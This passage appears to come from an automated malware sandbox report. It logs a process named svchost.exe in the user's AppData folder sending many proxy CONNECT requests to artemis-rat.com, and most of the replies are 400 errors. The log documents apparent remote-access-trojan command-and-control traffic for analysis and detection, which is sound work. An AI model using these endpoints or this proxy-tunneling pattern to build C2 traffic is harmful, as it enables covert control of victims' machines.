                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3246192.168.2.560343124.29.249.56567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.896790981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3247192.168.2.55900379.143.187.58173043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.900130987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3248192.168.2.560398200.10.73.210567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.914402008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3249192.168.2.560420184.185.2.12414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.916510105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3250192.168.2.559158177.234.194.15899943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.917078018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3251192.168.2.5603945.252.23.220108143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.930141926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3252192.168.2.560365111.90.150.109108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.931101084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3253192.168.2.560472104.19.217.2198043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.997126102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.151871920 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3254192.168.2.560474172.67.182.388043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.997129917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.151370049 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3255192.168.2.560473104.27.66.318043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.997155905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.152012110 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3256192.168.2.560485172.64.86.2178043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.006881952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.161397934 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3257192.168.2.560492172.67.182.1538043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.006905079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.161145926 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3258192.168.2.559169211.253.24.57333443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.007158041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3259192.168.2.560493104.19.235.108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.007433891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.162103891 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3260192.168.2.560482104.20.205.1918043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.007446051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.162166119 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3261192.168.2.56049845.12.31.1048043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.007523060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.162347078 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3262192.168.2.560501104.23.100.738043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.007539988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.162270069 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3263192.168.2.560436203.222.24.368043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.007675886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3264192.168.2.560022162.240.239.1034277143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.007710934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.176986933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3265192.168.2.56043445.81.232.175328843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.008259058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.833146095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.833714962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.849400997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3266192.168.2.559976115.96.208.124808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.008321047 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:35.427756071 CET72INHTTP/1.1 200 Connection Established
                                                                                    Proxy-Agent: Fortinet-Proxy/1.0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3267192.168.2.555433164.92.237.1886372243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.008618116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.176990032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3268192.168.2.559901111.59.4.88900243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.010195971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.333445072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.940727949 CET311INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:36 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3269192.168.2.560529104.27.26.298043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.010843039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.165360928 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
